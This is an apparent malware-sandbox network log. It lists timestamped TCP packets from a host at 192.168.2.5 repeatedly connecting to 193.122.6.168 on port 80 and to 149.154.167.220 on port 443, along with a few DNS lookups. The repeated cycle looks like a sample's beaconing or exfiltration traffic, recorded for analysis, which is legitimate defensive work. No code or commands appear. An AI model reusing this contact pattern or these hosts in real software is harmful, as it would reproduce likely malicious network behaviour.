                                                                        Dec 12, 2024 21:41:31.048698902 CET44350070149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:31.050220013 CET50070443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:31.050267935 CET44350070149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:31.050319910 CET50070443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:31.208518982 CET5007180192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:31.328337908 CET8050071193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:31.328489065 CET5007180192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:31.328754902 CET5007180192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:31.448468924 CET8050071193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:32.617191076 CET8050071193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:32.624947071 CET5007180192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:32.625731945 CET50072443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:32.625788927 CET44350072149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:32.625874043 CET50072443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:32.626446009 CET50072443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:32.626458883 CET44350072149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:32.745016098 CET8050071193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:32.745119095 CET5007180192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:34.014837980 CET44350072149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:34.014952898 CET50072443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:34.016515017 CET50072443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:34.016525984 CET44350072149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:34.017036915 CET44350072149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:34.205399990 CET50072443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:36.029366016 CET50072443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:36.029505014 CET44350072149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:36.029697895 CET50072443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:36.147934914 CET5007480192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:36.268001080 CET8050074193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:36.268078089 CET5007480192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:36.268332958 CET5007480192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:36.388061047 CET8050074193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:37.549618006 CET8050074193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:37.559354067 CET5007480192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:37.563337088 CET50075443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:37.563385963 CET44350075149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:37.566118002 CET50075443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:37.566231012 CET50075443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:37.566241980 CET44350075149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:37.680437088 CET8050074193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:37.680943966 CET5007480192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:39.015635967 CET44350075149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:39.015750885 CET50075443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:39.019893885 CET50075443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:39.019908905 CET44350075149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:39.020194054 CET44350075149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:39.060998917 CET50075443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:40.837327003 CET50075443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:40.837455988 CET44350075149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:40.837524891 CET50075443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:40.931298971 CET5007780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:41.051369905 CET8050077193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:41.051476002 CET5007780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:41.051714897 CET5007780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:41.171528101 CET8050077193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:42.319103956 CET8050077193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:42.331609964 CET50078443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:42.331660032 CET44350078149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:42.331675053 CET5007780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:42.331715107 CET50078443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:42.332257986 CET50078443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:42.332273006 CET44350078149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:42.452032089 CET8050077193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:42.452189922 CET5007780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:43.724284887 CET44350078149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:43.724400997 CET50078443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:43.725888014 CET50078443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:43.725898027 CET44350078149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:43.726149082 CET44350078149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:43.908555031 CET50078443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:45.780093908 CET50078443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:45.780213118 CET44350078149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:45.780275106 CET50078443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:45.891889095 CET5008080192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:46.011768103 CET8050080193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:46.011883974 CET5008080192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:46.012015104 CET5008080192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:46.131735086 CET8050080193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:47.279660940 CET8050080193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:47.288331032 CET5008080192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:47.289226055 CET50081443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:47.289290905 CET44350081149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:47.289535999 CET50081443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:47.291003942 CET50081443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:47.291032076 CET44350081149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:47.408848047 CET8050080193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:47.414957047 CET5008080192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:48.661868095 CET44350081149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:48.662115097 CET50081443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:48.663655996 CET50081443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:48.663667917 CET44350081149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:48.663996935 CET44350081149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:48.721079111 CET50081443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:50.705118895 CET50081443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:50.705323935 CET44350081149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:50.705446005 CET50081443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:50.796377897 CET5008380192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:50.916342020 CET8050083193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:50.916415930 CET5008380192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:50.916521072 CET5008380192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:51.036462069 CET8050083193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:52.184236050 CET8050083193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:52.195430994 CET5008380192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:52.195616007 CET50084443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:52.195672989 CET44350084149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:52.195736885 CET50084443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:52.196336031 CET50084443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:52.196352005 CET44350084149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:52.315783024 CET8050083193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:52.315846920 CET5008380192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:53.578114986 CET44350084149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:53.578208923 CET50084443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:53.579967976 CET50084443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:53.579982042 CET44350084149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:53.580329895 CET44350084149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:53.629930973 CET50084443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:55.827518940 CET50084443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:55.827794075 CET44350084149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:55.827857971 CET50084443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:55.917890072 CET5008680192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:56.038465023 CET8050086193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:56.038532019 CET5008680192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:56.038722992 CET5008680192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:56.160764933 CET8050086193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:57.355071068 CET8050086193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:57.364289999 CET5008680192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:57.365040064 CET50087443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:57.365084887 CET44350087149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:57.365175009 CET50087443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:57.365680933 CET50087443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:57.365690947 CET44350087149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:57.484596014 CET8050086193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:41:57.484673023 CET5008680192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:41:58.730340958 CET44350087149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:58.730420113 CET50087443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:58.731863022 CET50087443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:41:58.731872082 CET44350087149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:58.732127905 CET44350087149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:41:58.814779997 CET50087443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:00.632320881 CET50087443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:00.632432938 CET44350087149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:00.632493019 CET50087443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:00.730664968 CET5008980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:00.850763083 CET8050089193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:42:00.850852966 CET5008980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:00.851011992 CET5008980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:00.971993923 CET8050089193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:42:02.120084047 CET8050089193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:42:02.129007101 CET5008980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:02.129017115 CET50090443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:02.129112959 CET44350090149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:02.129303932 CET50090443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:02.133029938 CET50090443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:02.133068085 CET44350090149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:02.250848055 CET8050089193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:42:02.250942945 CET5008980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:03.514010906 CET44350090149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:03.514112949 CET50090443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:03.518111944 CET50090443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:03.518124104 CET44350090149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:03.518354893 CET44350090149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:03.721064091 CET50090443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:05.542268991 CET50090443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:05.542406082 CET44350090149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:05.542562008 CET50090443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:05.703370094 CET5009280192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:05.823168039 CET8050092193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:42:05.823385000 CET5009280192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:05.823609114 CET5009280192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:05.944396973 CET8050092193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:42:07.155023098 CET8050092193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:42:07.161885023 CET5009280192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:07.162758112 CET50093443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:07.162811041 CET44350093149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:07.167107105 CET50093443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:07.167701006 CET50093443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:07.167714119 CET44350093149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:07.400504112 CET8050092193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:42:07.400811911 CET5009280192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:08.648947954 CET44350093149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:08.649132967 CET50093443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:08.650665998 CET50093443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:08.650677919 CET44350093149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:08.651025057 CET44350093149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:08.814913988 CET50093443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:10.585211992 CET50093443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:10.585356951 CET44350093149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:10.585413933 CET50093443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:10.699898005 CET5009580192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:10.819732904 CET8050095193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:42:10.819801092 CET5009580192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:10.819938898 CET5009580192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:10.939826965 CET8050095193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:42:12.090312004 CET8050095193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:42:12.105633974 CET50096443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:12.105669975 CET44350096149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:12.106738091 CET50096443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:12.107434034 CET50096443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:12.107445955 CET44350096149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:12.181548119 CET5009580192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:13.473495007 CET44350096149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:13.473691940 CET50096443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:13.479002953 CET50096443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:13.479012012 CET44350096149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:13.479377031 CET44350096149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:13.691339016 CET44350096149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:13.691637039 CET50096443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:15.538798094 CET50096443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:15.538925886 CET44350096149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:15.538985968 CET50096443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:15.684835911 CET5009580192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:15.686037064 CET5009880192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:15.805069923 CET8050095193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:42:15.805141926 CET5009580192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:15.805869102 CET8050098193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:42:15.805939913 CET5009880192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:15.806082010 CET5009880192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:15.925961971 CET8050098193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:42:17.084002972 CET8050098193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:42:17.092628956 CET50099443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:17.092695951 CET44350099149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:17.092772961 CET50099443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:17.093132973 CET50099443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:17.093147039 CET44350099149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:17.207222939 CET5009880192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:18.473357916 CET44350099149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:18.473450899 CET50099443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:18.475023985 CET50099443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:18.475044012 CET44350099149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:18.475446939 CET44350099149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:18.517955065 CET50099443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:19.727013111 CET5009880192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:20.434757948 CET50099443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:20.434983015 CET44350099149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:20.435101032 CET50099443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:20.523056030 CET5010180192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:20.643081903 CET8050101193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:42:20.643250942 CET5010180192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:20.643524885 CET5010180192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:20.763425112 CET8050101193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:42:21.910072088 CET8050101193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:42:21.918096066 CET5010180192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:21.918975115 CET50102443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:21.919024944 CET44350102149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:21.923067093 CET50102443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:21.923607111 CET50102443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:21.923619032 CET44350102149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:22.039690971 CET8050101193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:42:22.039798975 CET5010180192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:23.324256897 CET44350102149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:23.328026056 CET50102443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:23.328026056 CET50102443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:23.328058958 CET44350102149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:23.328365088 CET44350102149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:23.411053896 CET50102443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:25.256403923 CET50102443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:25.256524086 CET44350102149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:25.256599903 CET50102443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:25.360637903 CET5010480192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:25.480542898 CET8050104193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:42:25.480635881 CET5010480192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:25.480766058 CET5010480192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:25.601659060 CET8050104193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:42:26.810435057 CET8050104193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:42:26.819179058 CET5010480192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:26.819475889 CET50105443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:26.819514990 CET44350105149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:26.823075056 CET50105443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:26.823631048 CET50105443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:26.823647976 CET44350105149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:26.939585924 CET8050104193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:42:26.943123102 CET5010480192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:28.198873043 CET44350105149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:28.198950052 CET50105443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:28.204694033 CET50105443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:28.204708099 CET44350105149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:28.205025911 CET44350105149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:28.408529043 CET50105443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:30.469948053 CET50105443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:30.470086098 CET44350105149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:30.470150948 CET50105443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:30.614435911 CET5010780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:30.734348059 CET8050107193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:42:30.734440088 CET5010780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:30.734570980 CET5010780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:30.855350971 CET8050107193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:42:32.002806902 CET8050107193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:42:32.010253906 CET5010780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:32.010329008 CET50108443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:32.010395050 CET44350108149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:32.010703087 CET50108443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:32.011101961 CET50108443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:32.011127949 CET44350108149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:32.130579948 CET8050107193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:42:32.130724907 CET5010780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:33.390038013 CET44350108149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:33.391030073 CET50108443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:33.391817093 CET50108443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:33.391829967 CET44350108149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:33.392168999 CET44350108149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:33.519303083 CET50108443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:35.337897062 CET50108443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:35.338025093 CET44350108149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:35.338082075 CET50108443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:35.433435917 CET5011080192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:35.553349972 CET8050110193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:42:35.553471088 CET5011080192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:35.553623915 CET5011080192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:35.673383951 CET8050110193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:42:36.826181889 CET8050110193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:42:36.836848974 CET5011080192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:36.837248087 CET50111443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:36.837296963 CET44350111149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:36.837361097 CET50111443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:36.838135004 CET50111443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:36.838146925 CET44350111149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:36.957113981 CET8050110193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:42:36.957221031 CET5011080192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:42:38.199800968 CET44350111149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:38.200022936 CET50111443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:38.201597929 CET50111443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:42:38.201610088 CET44350111149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:38.201901913 CET44350111149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:42:38.341042042 CET50111443192.168.2.5149.154.167.220

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Dec 12, 2024 21:38:35.964232922 CET6155853192.168.2.51.1.1.1
                                                                        Dec 12, 2024 21:38:36.101943016 CET53615581.1.1.1192.168.2.5
                                                                        Dec 12, 2024 21:38:38.027304888 CET6046353192.168.2.51.1.1.1
                                                                        Dec 12, 2024 21:38:38.367252111 CET53604631.1.1.1192.168.2.5
                                                                        Dec 12, 2024 21:38:45.847441912 CET5105453192.168.2.51.1.1.1
                                                                        Dec 12, 2024 21:38:45.985619068 CET53510541.1.1.1192.168.2.5
                                                                        Dec 12, 2024 21:41:14.409028053 CET6336653192.168.2.51.1.1.1
                                                                        Dec 12, 2024 21:41:14.658988953 CET53633661.1.1.1192.168.2.5

                                                                        DNS Queries

